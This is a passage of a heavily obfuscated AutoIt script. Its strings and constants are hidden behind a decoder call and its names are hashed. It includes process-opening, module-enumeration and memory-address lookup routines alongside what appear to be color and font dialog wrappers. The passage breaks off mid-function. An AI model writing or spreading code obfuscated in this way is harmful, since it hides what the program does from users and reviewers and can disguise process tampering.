  6163.         Global $a1c7e41292d = a2b00005424($os[5487]), $a217e610329 = a2b00005424($os[5488]), $a417e814243 = a2b00005424($os[5489]), $a1b7e912e4b = a2b00005424($os[5490]), $a167ea12a49 = a2b00005424($os[5491]), $a4d7ec1521b = a2b00005424($os[5492]), $a0f7ed13c42 = a2b00005424($os[5493]), $a3e7ee13420 = a2b00005424($os[5494]), $a2b7ef13e3d = a2b00005424($os[5495]), $a1d8e011051 = a2b00005424($os[5496]), $a068e11315a = a2b00005424($os[5497]), $a5c8e213a2a = a2b00005424($os[5498]), $a188e311f50 = a2b00005424($os[5499]), $a238e414d48 = a2b00005424($os[5500]), $a078e51463f = a2b00005424($os[5501]), $a208e614e09 = a2b00005424($os[5502]), $a4f8e715a38 = a2b00005424($os[5503]), $a288e815b1f = a2b00005424($os[5504]), $a288e915136 = a2b00005424($os[5505]), $a578ea13744 = a2b00005424($os[5506]), $a578eb13a5c = a2b00005424($os[5507]), $a3b8ec1385f = a2b00005424($os[5508]), $a108ed1011b = a2b00005424($os[5509]), $a0b8ee11714 = a2b00005424($os[5510]), $a3d9e013f63 = a2b00005424($os[5511]), $a459e115f19 = a2b00005424($os[5512]), $a249e216339 = a2b00005424($os[5513]), $a5d9e310d47 = a2b00005424($os[5514]), $a469e414d0d = a2b00005424($os[5515]), $a5c9e51453e = a2b00005424($os[5516]), $a1b9e613f49 = a2b00005424($os[5517]), $a039e712e60 = a2b00005424($os[5518]), $a329e811932 = a2b00005424($os[5519]), $a5c9e911c3b = a2b00005424($os[5520]), $a3b9ea1475a = a2b00005424($os[5521]), $a1a9eb1262c = a2b00005424($os[5522]), $a489ec11552 = a2b00005424($os[5523]), $a3b9ed12058 = a2b00005424($os[5524]), $a1a9ee15057 = a2b00005424($os[5525]), $a509ef1571e = a2b00005424($os[5526]), $a60ae010a10 = a2b00005424($os[5527]), $a1aae114b3a = a2b00005424($os[5528]), $a13ae214450 = a2b00005424($os[5529]), $a01ae31270a = a2b00005424($os[5530]), $a1eae410c26 = a2b00005424($os[5531]), $a5aae513721 = a2b00005424($os[5532]), $a3eae612b18 = a2b00005424($os[5533]), $a0fae714a4e = a2b00005424($os[5534]), $a57ae815e35 = a2b00005424($os[5535]), $a14ae915d40 = a2b00005424($os[5536]), $a0daea16154 = a2b00005424($os[5537]), $a2aaeb1162d = a2b00005424($os[5538])
  6164.         Global $a1eaec13630 = a2b00005424($os[5539]), $a13aed15b04 = a2b00005424($os[5540]), $a14aee14710 = a2b00005424($os[5541]), $a17aef1044c = a2b00005424($os[5542]), $a1ebe015e00 = a2b00005424($os[5543]), $a3abe11292f = a2b00005424($os[5544]), $a42be212d25 = a2b00005424($os[5545]), $a52be310a30 = a2b00005424($os[5546]), $a34be411f17 = a2b00005424($os[5547]), $a1fbe514b5c = a2b00005424($os[5548]), $a05be613127 = a2b00005424($os[5549]), $a2abe813763 = a2b00005424($os[5550]), $a0dbe911530 = a2b00005424($os[5551]), $a1abea15944 = a2b00005424($os[5552]), $a1bbeb10663 = a2b00005424($os[5553]), $a20bec10d57 = a2b00005424($os[5554]), $a3ebed14958 = a2b00005424($os[5555]), $a4fbee13306 = a2b00005424($os[5556]), $a40bef1413e = a2b00005424($os[5557]), $a1fce01314d = a2b00005424($os[5558]), $a59ce114b2d = a2b00005424($os[5559]), $a13ce212c25 = a2b00005424($os[5560]), $a3dce31333b = a2b00005424($os[5561]), $a36ce415343 = a2b00005424($os[5562]), $a0fce512043 = a2b00005424($os[5563]), $a0bce610e04 = a2b00005424($os[5564]), $a4fce71365a = a2b00005424($os[5565]), $a06ce814936 = a2b00005424($os[5566])
  6165.         Global $ssa1741901449 = 1
  6166.     EndIf
  6167.     Local $a5082710732, $a1e6ee15229, $a346ef11b24, $a107e014e0c, $a2d7e114532, $a227e21621c, $a167e310011
  6168.     $a2d7e114532 = Number($a1c7e41292d)
  6169.     $a327e51025a = DllStructCreate($a217e610329)
  6170.     If IsArray($a5c6ec12d5c) Then $a2d7e114532 = UBound($a5c6ec12d5c)
  6171.     $a117e714333 = DllStructCreate($a417e814243 & (Number($a1b7e912e4b) * $a2d7e114532) & $a167ea12a49)
  6172.     $a397eb1255f = DllStructCreate($a4d7ec1521b & (Number($a0f7ed13c42) * $a2d7e114532) & $a3e7ee13420)
  6173.     $a107e014e0c = DllCall($a2b7ef13e3d, $a1d8e011051, $a068e11315a)
  6174.     $a1e6ee15229 = DllCall($a5c8e213a2a, $a188e311f50, $a238e414d48, $a078e51463f, $a107e014e0c[Number($a208e614e09)], $a4f8e715a38, BitOR($a09c9804f35, $a17c9401a48), $a288e815b1f, Number($a288e915136))
  6175.     If $a1e6ee15229[Number($a578ea13744)] Then
  6176.         $a5082710732 = $a1e6ee15229[Number($a578eb13a5c)]
  6177.         DllStructSetData($a117e714333, Number($a3b8ec1385f), Number($a108ed1011b))
  6178.         $a227e21621c = Number($a0b8ee11714)
  6179.         While $a227e21621c <= $a2d7e114532
  6180.             If IsArray($a5c6ec12d5c) Then
  6181.                 $a138ef11d57 = $a227e21621c - Number($a3d9e013f63)
  6182.                 $a167e310011 = $a5c6ec12d5c[$a138ef11d57]
  6183.             Else
  6184.                 $a167e310011 = $a5c6ec12d5c
  6185.             EndIf
  6186.             $a430131125a = DllCall($a459e115f19, $a249e216339, $a5d9e310d47, $a469e414d0d, "", $a5c9e51453e, $a167e310011, $a1b9e613f49, DllStructGetPtr($a327e51025a))
  6187.             If $a430131125a[Number($a039e712e60)] Then
  6188.                 If $a366ed1080c Then
  6189.                     DllStructSetData($a117e714333, Number($a329e811932), $a2a89100625, (Number($a5c9e911c3b) * $a227e21621c))
  6190.                 Else
  6191.                     DllStructSetData($a117e714333, Number($a3b9ea1475a), Number($a1a9eb1262c), (Number($a489ec11552) * $a227e21621c))
  6192.                 EndIf
  6193.                 DllStructSetData($a117e714333, Number($a3b9ed12058), DllStructGetData($a327e51025a, Number($a1a9ee15057)), (Number($a509ef1571e) * ($a227e21621c - Number($a60ae010a10))) + Number($a1aae114b3a))
  6194.                 DllStructSetData($a117e714333, Number($a13ae214450), DllStructGetData($a327e51025a, Number($a01ae31270a)), (Number($a1eae410c26) * ($a227e21621c - Number($a5aae513721))) + Number($a3eae612b18))
  6195.                 DllStructSetData($a327e51025a, Number($a0fae714a4e), Number($a57ae815e35))
  6196.                 DllStructSetData($a327e51025a, Number($a14ae915d40), Number($a0daea16154))
  6197.             EndIf
  6198.             $a227e21621c += Number($a2aaeb1162d)
  6199.         WEnd
  6200.         $a430131125a = DllCall($a1eaec13630, $a13aed15b04, $a14aee14710, $a17aef1044c, $a5082710732, $a1ebe015e00, Number($a3abe11292f), $a42be212d25, DllStructGetPtr($a117e714333), $a52be310a30, DllStructGetSize($a397eb1255f), $a34be411f17, DllStructGetPtr($a397eb1255f), $a1fbe514b5c, Number($a05be613127))
  6201.         $a42be712618 = DllCall($a2abe813763, $a0dbe911530, $a1abea15944)
  6202.     EndIf
  6203.     $a397eb1255f = Number($a1bbeb10663)
  6204.     $a117e714333 = Number($a20bec10d57)
  6205.     $a327e51025a = Number($a3ebed14958)
  6206.     If $a1e6ee15229[Number($a4fbee13306)] = Number($a40bef1413e) Then Return Number($a1fce01314d)
  6207.     $a1e6ee15229 = DllCall($a59ce114b2d, $a13ce212c25, $a3dce31333b, $a36ce415343, $a5082710732)
  6208.     If NOT $a430131125a[Number($a0fce512043)] AND NOT $a1e6ee15229[Number($a0bce610e04)] Then Return Number($a4fce71365a)
  6209.     Return $a430131125a[Number($a06ce814936)]
  6210. EndFunc
  6211.  
  6212. Func a5641a04a5d($a10bda14f3e, $a1bce910740 = 0)
  6213.     If NOT IsDeclared("SSA5641A04A5D") Then
  6214.         Global $a61cea14c02 = a2b00005424($os[5567]), $a45ceb14723 = a2b00005424($os[5568]), $a2fcee1635a = a2b00005424($os[5569]), $a28cef1034f = a2b00005424($os[5570]), $a4bde012618 = a2b00005424($os[5571]), $a54de11431a = a2b00005424($os[5572]), $a2dde215f22 = a2b00005424($os[5573]), $a5dde31022a = a2b00005424($os[5574]), $a12de415519 = a2b00005424($os[5575]), $a19de510313 = a2b00005424($os[5576]), $a39de610e20 = a2b00005424($os[5577]), $a2cde71043c = a2b00005424($os[5578]), $a52de813404 = a2b00005424($os[5579]), $a0ede911941 = a2b00005424($os[5580]), $a02dea15404 = a2b00005424($os[5581]), $a1bdeb10d48 = a2b00005424($os[5582]), $a3adec10c1f = a2b00005424($os[5583]), $a27ded10762 = a2b00005424($os[5584]), $a3ddee12b15 = a2b00005424($os[5585]), $a44def1145e = a2b00005424($os[5586]), $a31ee010027 = a2b00005424($os[5587]), $a1cee113a32 = a2b00005424($os[5588]), $a46ee21475d = a2b00005424($os[5589]), $a59ee312735 = a2b00005424($os[5590]), $a32ee414d23 = a2b00005424($os[5591]), $a32ee510935 = a2b00005424($os[5592]), $a49ee613562 = a2b00005424($os[5593]), $a5aee713639 = a2b00005424($os[5594]), $a24ee810056 = a2b00005424($os[5595]), $a4eee911f1e = a2b00005424($os[5596]), $a15eea11219 = a2b00005424($os[5597]), $a05eeb12744 = a2b00005424($os[5598]), $a38eec12a2e = a2b00005424($os[5599]), $a60eed1625c = a2b00005424($os[5600])
  6215.         Global $ssa5641a04a5d = 1
  6216.     EndIf
  6217.     Local $a18cdb1110b = Number($a61cea14c02)
  6218.     Local $a40cdf14a50 = DllStructCreate($a45ceb14723)
  6219.     Local $a5ccec14e1b
  6220.     Local $a52ced14e40
  6221.     If NOT IsArray($a10bda14f3e) Then
  6222.         SetError(Number($a2fcee1635a))
  6223.         Return Number($a28cef1034f)
  6224.     EndIf
  6225.     DllCall($a10bda14f3e[Number($a4bde012618)], $a54de11431a, $a2dde215f22, $a5dde31022a, $a10bda14f3e[Number($a12de415519)], $a19de510313, $a18cdb1110b, $a39de610e20, DllStructGetPtr($a40cdf14a50), $a2cde71043c, DllStructGetSize($a40cdf14a50))
  6226.     If NOT @error Then
  6227.         $a5ccec14e1b = Hex(DllStructGetData($a40cdf14a50, Number($a52de813404)))
  6228.         $a52ced14e40 = Hex(DllStructGetData($a40cdf14a50, Number($a0ede911941)))
  6229.         While $a52ced14e40 <> $a02dea15404
  6230.             DllCall($a10bda14f3e[Number($a1bdeb10d48)], $a3adec10c1f, $a27ded10762, $a3ddee12b15, $a10bda14f3e[Number($a44def1145e)], $a31ee010027, $a18cdb1110b, $a1cee113a32, DllStructGetPtr($a40cdf14a50), $a46ee21475d, DllStructGetSize($a40cdf14a50))
  6231.             $a5ccec14e1b = Hex(DllStructGetData($a40cdf14a50, Number($a59ee312735)))
  6232.             $a52ced14e40 = Hex(DllStructGetData($a40cdf14a50, Number($a32ee414d23)))
  6233.             If Hex($a18cdb1110b) = $a32ee510935 Then ExitLoop
  6234.             $a18cdb1110b += Number($a49ee613562)
  6235.         WEnd
  6236.         If $a52ced14e40 = $a5aee713639 Then
  6237.             SetError(Number($a24ee810056))
  6238.             If $a1bce910740 = Number($a4eee911f1e) Then
  6239.                 Return Dec($a5ccec14e1b)
  6240.             Else
  6241.                 Return $a5ccec14e1b
  6242.             EndIf
  6243.         Else
  6244.             SetError(Number($a15eea11219))
  6245.             Return Number($a05eeb12744)
  6246.         EndIf
  6247.     Else
  6248.         SetError(Number($a38eec12a2e))
  6249.         Return Number($a60eed1625c)
  6250.     EndIf
  6251. EndFunc
  6252.  
  6253. Func a4d41b02e0c($a3441813a38, $a04eee15f4d)
  6254.     If NOT IsDeclared("SSA4D41B02E0C") Then
  6255.         Global $a33eef1180c = a2b00005424($os[5601]), $a35fe012860 = a2b00005424($os[5602]), $a32fe111162 = a2b00005424($os[5603]), $a17fe210e45 = a2b00005424($os[5604]), $a35fe314c57 = a2b00005424($os[5605]), $a1bfe410b21 = a2b00005424($os[5606]), $a45fe615d47 = a2b00005424($os[5607]), $a45fe815637 = a2b00005424($os[5608]), $a34fe91603c = a2b00005424($os[5609]), $a22fea13028 = a2b00005424($os[5610]), $a2cfeb10424 = a2b00005424($os[5611]), $a2bfec14f32 = a2b00005424($os[5612]), $a2afed13504 = a2b00005424($os[5613]), $a0afee10a27 = a2b00005424($os[5614]), $a62fef10525 = a2b00005424($os[5615]), $a200f01432e = a2b00005424($os[5616]), $a360f114963 = a2b00005424($os[5617]), $a4f0f213d3c = a2b00005424($os[5618]), $a310f312c2d = a2b00005424($os[5619]), $a090f415457 = a2b00005424($os[5620]), $a560f51610e = a2b00005424($os[5621]), $a300f613d22 = a2b00005424($os[5622]), $a0b0f812f0d = a2b00005424($os[5623]), $a2d0f912452 = a2b00005424($os[5624]), $a4d0fa11037 = a2b00005424($os[5625]), $a170fb15831 = a2b00005424($os[5626]), $a520fc1463e = a2b00005424($os[5627]), $a600fd10618 = a2b00005424($os[5628]), $a210fe14c0a = a2b00005424($os[5629]), $a030ff15600 = a2b00005424($os[5630]), $a2f1f014a63 = a2b00005424($os[5631]), $a611f112a19 = a2b00005424($os[5632]), $a371f313b39 = a2b00005424($os[5633]), $a251f411324 = a2b00005424($os[5634]), $a311f610f27 = a2b00005424($os[5635]), $a3f1f71511b = a2b00005424($os[5636]), $a601f813a4b = a2b00005424($os[5637]), $a2e1f911141 = a2b00005424($os[5638]), $a281fa13840 = a2b00005424($os[5639]), $a521fb11f30 = a2b00005424($os[5640]), $a121fc11d4b = a2b00005424($os[5641]), $a211fd1082a = a2b00005424($os[5642]), $a571fe15150 = a2b00005424($os[5643]), $a391ff13e18 = a2b00005424($os[5644]), $a042f01370f = a2b00005424($os[5645]), $a012f11602d = a2b00005424($os[5646]), $a042f212641 = a2b00005424($os[5647]), $a002f312360 = a2b00005424($os[5648])
  6256.         Global $ssa4d41b02e0c = 1
  6257.     EndIf
  6258.     If NOT ProcessExists($a3441813a38) Then Return SetError(Number($a33eef1180c), Number($a35fe012860), Number($a32fe111162))
  6259.     If NOT IsString($a04eee15f4d) Then Return SetError(Number($a17fe210e45), Number($a35fe314c57), Number($a1bfe410b21))
  6260.     Local $a0afe51293e = DllOpen($a45fe615d47)
  6261.     Local $a598f105931
  6262.     Local $a48fe714b37 = BitOR(Number($a45fe815637), Number($a34fe91603c), Number($a22fea13028), Number($a2cfeb10424), Number($a2bfec14f32))
  6263.     If $a3441813a38 > Number($a2afed13504) Then
  6264.         Local $a598f105931 = DllCall($a0afee10a27, $a62fef10525, $a200f01432e, $a360f114963, $a48fe714b37, $a4f0f213d3c, Number($a310f312c2d), $a090f415457, $a3441813a38)
  6265.         If $a598f105931[Number($a560f51610e)] Then
  6266.             $a598f105931 = $a598f105931[Number($a300f613d22)]
  6267.         EndIf
  6268.     EndIf
  6269.     Local $a600f71395e = DllStructCreate($a0b0f812f0d)
  6270.     Local $a3e0e502f1b = DllCall($a0afe51293e, $a2d0f912452, $a4d0fa11037, $a170fb15831, $a598f105931, $a520fc1463e, DllStructGetPtr($a600f71395e), $a600fd10618, DllStructGetSize($a600f71395e), $a210fe14c0a, Number($a030ff15600))
  6271.     If $a3e0e502f1b[Number($a2f1f014a63)] > Number($a611f112a19) Then
  6272.         Local $a131f214238 = $a3e0e502f1b[Number($a371f313b39)] / Number($a251f411324)
  6273.         Local $a1a1f512204
  6274.         For $a3800e12616 = Number($a311f610f27) To $a131f214238
  6275.             $a1a1f512204 = DllCall($a0afe51293e, $a3f1f71511b, $a601f813a4b, $a2e1f911141, $a598f105931, $a281fa13840, Ptr(DllStructGetData($a600f71395e, Number($a521fb11f30), $a3800e12616)), $a121fc11d4b, "", $a211fd1082a, Number($a571fe15150))
  6276.             If $a1a1f512204[Number($a391ff13e18)] = $a04eee15f4d Then
  6277.                 DllClose($a0afe51293e)
  6278.                 Return Ptr(DllStructGetData($a600f71395e, Number($a042f01370f), $a3800e12616))
  6279.             EndIf
  6280.         Next
  6281.     EndIf
  6282.     DllClose($a0afe51293e)
  6283.     Return SetError(-Number($a012f11602d), Number($a042f212641), Number($a002f312360))
  6284. EndFunc
  6285.  
  6286. Global Const $a172f413645 = Number($a4e2f511d01)
  6287. Global Const $a622f612836 = Number($a032f713761)
  6288. Global Const $a0f2f811943 = Number($a072f914352)
  6289. Global Const $a112fa10820 = Number($a1b2fb15310)
  6290. Global Const $a2c2fc11311 = Number($a3d2fd11432)
  6291. Global Const $a202fe15301 = Number($a182ff1213e)
  6292. Global Const $a243f011a46 = Number($a2d3f115521)
  6293. Global Const $a043f216022 = Number($a2a3f31604e)
  6294. Global Const $a603f411c2c = Number($a433f51570b)
  6295. Global Const $a5e3f610009 = Number($a213f71134f)
  6296. Global Const $a363f811d13 = Number($a1b3f91235a)
  6297. Global Const $a373fa10638 = Number($a113fb14054)
  6298. Global Const $a2e3fc10d3f = Number($a613fd14756)
  6299. Global Const $a1b3fe1412f = Number($a223ff16159)
  6300. Global Const $a3b4f016233 = Number($a284f11401c)
  6301. Global Const $a194f211707 = Number($a374f311945)
  6302. Global Const $a434f412241 = Number($a444f512523)
  6303. Global Const $a144f610d16 = Number($a474f712643)
  6304. Global Const $a5a4f812f06 = Number($a624f910500)
  6305. Global Const $a414fa15e58 = Number($a1a4fb15a0d)
  6306. Global Const $a294fc1142b = Number($a124fd1173c)
  6307. Global Const $a454fe1060a = Number($a1e4ff11246)
  6308. Global Const $a215f015e08 = Number($a375f11090e)
  6309. Global Const $a195f210012 = Number($a3b5f311e1d)
  6310. Global Const $a365f41244b = Number($a1e5f514646)
  6311. Global Const $a475f611411 = Number($a025f710e55)
  6312. Global Const $a265f810350 = Number($a3e5f915e4d)
  6313. Global Const $a315fa12b5a = Number($a5c5fb1273e)
  6314. Global Const $a135fc11036 = Number($a625fd11a19)
  6315. Global Const $a4d5fe13d24 = Number($a025ff15b1f)
  6316. Global Const $a2c6f016213 = Number($a4b6f110e1d)
  6317. Global Const $a386f21195e = Number($a3f6f313503)
  6318. Global Const $a5e6f413b42 = Number($a526f512362)
  6319. Global Const $a5c6f61151e = Number($a396f713a05)
  6320. Global Const $a546f810412 = Number($a2b6f910c33)
  6321. Global Const $a436fa1415f = Number($a2f6fb12b2c)
  6322. Global Const $a496fc11923 = Number($a526fd14d3d)
  6323. Global Const $a4a6fe1634c = Number($a496ff15f3e)
  6324. Global Const $a297f01040d = Number($a0a7f11154b)
  6325. Global Const $a017f210244 = Number($a4f7f31564d)
  6326. Global Const $a157f410b19 = Number($a267f510e2b)
  6327. Global Const $a1d7f612e31 = Number($a627f710b1b)
  6328. Global Const $a387f811f19 = Number($a187f914f15)
  6329. Global Const $a177fa13832 = Number($a457fb14809)
  6330. Global Const $a097fc11e11 = Number($a287fd10909)
  6331. Global Const $a167fe1170f = Number($a417ff10a10)
  6332. Global Const $a1a8f010850 = Number($a368f11323c)
  6333. Global Const $a018f210a1f = Number($a428f314152)
  6334. Global Const $a038f413e5b = Number($a278f515c43)
  6335. Global Const $a078f612962 = Number($a5c8f715815)
  6336. Global Const $a228f81112c = Number($a2f8f913846)
  6337. Global Const $a4e8fa10039 = Number($a5a8fb12d53)
  6338. Global Const $a0e8fc15028 = Number($a1a8fd15b1f)
  6339. Global Const $a448fe13b07 = Number($a148ff11e0f)
  6340. Global Const $a0d9f014631 = Number($a279f110124)
  6341. Global Const $a289f214b4f = Number($a3c9f310b5b)
  6342. Global Const $a3b9f41453a = Number($a2a9f514a25)
  6343. Global Const $a249f614c58 = Number($a3e9f713259)
  6344. Global Const $a579f812548 = Number($a029f915f37)
  6345. Global Const $a429fa15e49 = Number($a499fb10544)
  6346. Global Const $a099fc1202d = Number($a579fd1324f)
  6347. Global Const $a2b9fe10619 = Number($a169ff10e51)
  6348. Global Const $a04af013645 = Number($a36af112425)
  6349. Global Const $a25af21111d = Number($a26af310a14)
  6350. Global Const $a44af410b0c = Number($a63af511e59)
  6351. Global Const $a57af610a63 = Number($a5daf712712)
  6352. Global Const $a1faf81262d = Number($a19af911431)
  6353. Global Const $a0eafa10137 = Number($a20afb1210c)
  6354. Global Const $a1dafc14939 = Number($a01afd16047)
  6355. Global Const $a02afe12819 = Number($a46aff12709)
  6356. Global Const $a0dbf01121c = Number($a0bbf115121)
  6357. Global Const $a5cbf212635 = $a36bf313a50 & $a2ebf411425
  6358. Global Const $a00bf51153d = $a3abf614433 & $a2fbf713d35
  6359.  
  6360. Func a1b41c03b0e($a2fbf813627 = 0, $a18bf912e22 = 0, $a09bfa11124 = 0, $a45bfb14151 = 0)
  6361.     If NOT IsDeclared("SSA1B41C03B0E") Then
  6362.         Global $a0bbfd15950 = a2b00005424($os[5724]), $a09cf013914 = a2b00005424($os[5725]), $a4ccf111c45 = a2b00005424($os[5726]), $a20cf212861 = a2b00005424($os[5727]), $a61cf31450f = a2b00005424($os[5728]), $a2bcf415933 = a2b00005424($os[5729]), $a61cf514f00 = a2b00005424($os[5730]), $a4bcf61315c = a2b00005424($os[5731]), $a07cf71612d = a2b00005424($os[5732]), $a22cf812d60 = a2b00005424($os[5733]), $a02cf914910 = a2b00005424($os[5734]), $a06cfa1170d = a2b00005424($os[5735]), $a5ccfb10e63 = a2b00005424($os[5736]), $a3bcfc12e35 = a2b00005424($os[5737]), $a2ccfd11516 = a2b00005424($os[5738]), $a06cfe10556 = a2b00005424($os[5739]), $a05cff14136 = a2b00005424($os[5740]), $a3cdf014836 = a2b00005424($os[5741]), $a07df112953 = a2b00005424($os[5742]), $a1bdf213247 = a2b00005424($os[5743]), $a54df311104 = a2b00005424($os[5744]), $a15df413e5c = a2b00005424($os[5745]), $a39df511014 = a2b00005424($os[5746]), $a4cdf611f0d = a2b00005424($os[5747]), $a61df713c41 = a2b00005424($os[5748]), $a59df812259 = a2b00005424($os[5749]), $a43dfa1402d = a2b00005424($os[5750]), $a23dfb15332 = a2b00005424($os[5751]), $a11dfc12151 = a2b00005424($os[5752]), $a1bdfd14e3f = a2b00005424($os[5753]), $a0cdfe1370c = a2b00005424($os[5754]), $a3cdff15a03 = a2b00005424($os[5755]), $a1cef014709 = a2b00005424($os[5756]), $a32ef113b41 = a2b00005424($os[5757]), $a54ef211d53 = a2b00005424($os[5758]), $a44ef312c11 = a2b00005424($os[5759]), $a28ef410f37 = a2b00005424($os[5760]), $a41ef510907 = a2b00005424($os[5761]), $a4eef615202 = a2b00005424($os[5762]), $a4fef715249 = a2b00005424($os[5763]), $a15ef812f54 = a2b00005424($os[5764]), $a59ef911f31 = a2b00005424($os[5765]), $a04efa14f03 = a2b00005424($os[5766])
  6363.         Global $ssa1b41c03b0e = 1
  6364.     EndIf
  6365.     Local $a04bfc13654 = $a0bbfd15950
  6366.     Local $a62bfe14727 = DllStructCreate($a5cbf212635)
  6367.     Local $a58bff11139 = DllStructCreate($a04bfc13654)
  6368.     If $a09bfa11124 = Number($a09cf013914) Then
  6369.         $a18bf912e22 = Int($a18bf912e22)
  6370.     ElseIf $a09bfa11124 = Number($a4ccf111c45) Then
  6371.         $a18bf912e22 = Hex(String($a18bf912e22), Number($a20cf212861))
  6372.         $a18bf912e22 = $a61cf31450f & StringMid($a18bf912e22, Number($a2bcf415933), Number($a61cf514f00)) & StringMid($a18bf912e22, Number($a4bcf61315c), Number($a07cf71612d)) & StringMid($a18bf912e22, Number($a22cf812d60), Number($a02cf914910))
  6373.     EndIf
  6374.     DllStructSetData($a62bfe14727, $a06cfa1170d, DllStructGetSize($a62bfe14727))
  6375.     DllStructSetData($a62bfe14727, $a5ccfb10e63, $a45bfb14151)
  6376.     DllStructSetData($a62bfe14727, $a3bcfc12e35, $a18bf912e22)
  6377.     DllStructSetData($a62bfe14727, $a2ccfd11516, DllStructGetPtr($a58bff11139))
  6378.     DllStructSetData($a62bfe14727, $a06cfe10556, BitOR($a1dafc14939, $a02afe12819, $a0dbf01121c))
  6379.     Local $a505a20190d = DllCall($a05cff14136, $a3cdf014836, $a07df112953, $a1bdf213247, $a62bfe14727)
  6380.     If @error Then Return SetError(@error, @extended, -Number($a54df311104))
  6381.     If $a505a20190d[Number($a15df413e5c)] = Number($a39df511014) Then Return SetError(-Number($a4cdf611f0d), -Number($a61df713c41), -Number($a59df812259))
  6382.     Local $a09df915e61 = DllStructGetData($a62bfe14727, $a43dfa1402d)
  6383.     If $a2fbf813627 = Number($a23dfb15332) Then
  6384.         Return $a11dfc12151 & Hex(String($a09df915e61), Number($a1bdfd14e3f))
  6385.     ElseIf $a2fbf813627 = Number($a0cdfe1370c) Then
  6386.         $a09df915e61 = Hex(String($a09df915e61), Number($a3cdff15a03))
  6387.         Return $a1cef014709 & StringMid($a09df915e61, Number($a32ef113b41), Number($a54ef211d53)) & StringMid($a09df915e61, Number($a44ef312c11), Number($a28ef410f37)) & StringMid($a09df915e61, Number($a41ef510907), Number($a4eef615202))
  6388.     ElseIf $a2fbf813627 = Number($a4fef715249) Then
  6389.         Return $a09df915e61
  6390.     Else
  6391.         Return SetError(-Number($a15ef812f54), -Number($a59ef911f31), -Number($a04efa14f03))
  6392.     EndIf
  6393. EndFunc
  6394.  
  6395. Func a0141d05e00($a14efb11243 = "Courier New", $a14efc1045d = 10, $a18bf912e22 = 0, $a3befd15637 = 0, $a42efe13161 = False, $a20eff15126 = False, $a13ff010620 = False, $a26ff902411 = 0)
  6396.     If NOT IsDeclared("SSA0141D05E00") Then
  6397.         Global $a3cff210a06 = a2b00005424($os[5767]), $a2fff415014 = a2b00005424($os[5768]), $a5bff615f2e = a2b00005424($os[5769]), $a18ff714047 = a2b00005424($os[5770]), $a26ff913d0e = a2b00005424($os[5771]), $a07ffa14324 = a2b00005424($os[5772]), $a2affb1284b = a2b00005424($os[5773]), $a61ffd12059 = a2b00005424($os[5774]), $a4bffe11f20 = a2b00005424($os[5775]), $a56fff15323 = a2b00005424($os[5776]), $a5100023018 = a2b00005424($os[5777]), $a2500123b61 = a2b00005424($os[5778]), $a1b0022594c = a2b00005424($os[5779]), $a4f00322d1f = a2b00005424($os[5780]), $a2c00422739 = a2b00005424($os[5781]), $a2f00524653 = a2b00005424($os[5782]), $a5800620d61 = a2b00005424($os[5783]), $a2b00725f22 = a2b00005424($os[5784]), $a1d00820d13 = a2b00005424($os[5785]), $a0a00923140 = a2b00005424($os[5786]), $a4500a22709 = a2b00005424($os[5787]), $a4400b23143 = a2b00005424($os[5788]), $a1e00c25f4e = a2b00005424($os[5789]), $a3100d22e5e = a2b00005424($os[5790]), $a0300e22062 = a2b00005424($os[5791]), $a3f00f2004a = a2b00005424($os[5792]), $a1110025354 = a2b00005424($os[5793]), $a301012152f = a2b00005424($os[5794]), $a231022291a = a2b00005424($os[5795]), $a3910321537 = a2b00005424($os[5796]), $a3410424d53 = a2b00005424($os[5797]), $a321062550b = a2b00005424($os[5798]), $a4e10722549 = a2b00005424($os[5799]), $a3210823c24 = a2b00005424($os[5800]), $a3210920054 = a2b00005424($os[5801]), $a5a10a20425 = a2b00005424($os[5802]), $a0210b21f37 = a2b00005424($os[5803]), $a2410c2491e = a2b00005424($os[5804]), $a5710d22c02 = a2b00005424($os[5805]), $a3110e23523 = a2b00005424($os[5806]), $a4720121055 = a2b00005424($os[5807]), $a152022462c = a2b00005424($os[5808]), $a3820421434 = a2b00005424($os[5809]), $a4a20622822 = a2b00005424($os[5810]), $a292072560b = a2b00005424($os[5811]), $a4b20823f4e = a2b00005424($os[5812]), $a1c20920e35 = a2b00005424($os[5813]), $a1e20a20701 = a2b00005424($os[5814]), $a3d20b20d46 = a2b00005424($os[5815]), $a3f20c21a29 = a2b00005424($os[5816]), $a0b20d25d0f = a2b00005424($os[5817]), $a0b20e20542 = a2b00005424($os[5818])
  6398.         Global $a1620f2204a = a2b00005424($os[5819]), $a4630021e10 = a2b00005424($os[5820]), $a3a30122820 = a2b00005424($os[5821]), $a0230222802 = a2b00005424($os[5822]), $a2a30323455 = a2b00005424($os[5823]), $a1e30423c63 = a2b00005424($os[5824]), $a6030521744 = a2b00005424($os[5825]), $a5030626340 = a2b00005424($os[5826])
  6399.         Global $ssa0141d05e00 = 1
  6400.     EndIf
  6401.     Local $a29ff110740 = Number($a3cff210a06), $a1dff314d3b = Number($a2fff415014), $a16ff515f59 = Number($a5bff615f2e)
  6402.     Local $a4e4421023a = a0251401129(Number($a18ff714047))
  6403.     Local $a5cff815c55 = Round(($a14efc1045d * a2e51503047($a4e4421023a, $a294fc1142b)) / Number($a26ff913d0e), Number($a07ffa14324))
  6404.     a2b51603736(Number($a2affb1284b), $a4e4421023a)
  6405.     Local $a1effc12c13 = DllStructCreate($a00bf51153d)
  6406.     Local $a551db02607 = DllStructCreate($a3a1930301a)
  6407.     DllStructSetData($a1effc12c13, $a61ffd12059, DllStructGetSize($a1effc12c13))
  6408.     DllStructSetData($a1effc12c13, $a4bffe11f20, $a26ff902411)
  6409.     DllStructSetData($a1effc12c13, $a56fff15323, DllStructGetPtr($a551db02607))
  6410.     DllStructSetData($a1effc12c13, $a5100023018, $a14efc1045d)
  6411.     DllStructSetData($a1effc12c13, $a2500123b61, BitOR($a144f610d16, $a434f412241, $a194f211707, $a414fa15e58, $a5a4f812f06))
  6412.     DllStructSetData($a1effc12c13, $a1b0022594c, $a18bf912e22)
  6413.     DllStructSetData($a1effc12c13, $a4f00322d1f, Number($a2c00422739))
  6414.     DllStructSetData($a551db02607, $a2f00524653, $a5cff815c55)
  6415.     DllStructSetData($a551db02607, $a5800620d61, $a3befd15637)
  6416.     DllStructSetData($a551db02607, $a2b00725f22, $a42efe13161)
  6417.     DllStructSetData($a551db02607, $a1d00820d13, $a20eff15126)
  6418.     DllStructSetData($a551db02607, $a0a00923140, $a13ff010620)
  6419.     DllStructSetData($a551db02607, $a4500a22709, $a14efb11243)
  6420.     Local $a505a20190d = DllCall($a4400b23143, $a1e00c25f4e, $a3100d22e5e, $a0300e22062, $a1effc12c13)
  6421.     If @error Then Return SetError(@error, @extended, -Number($a3f00f2004a))
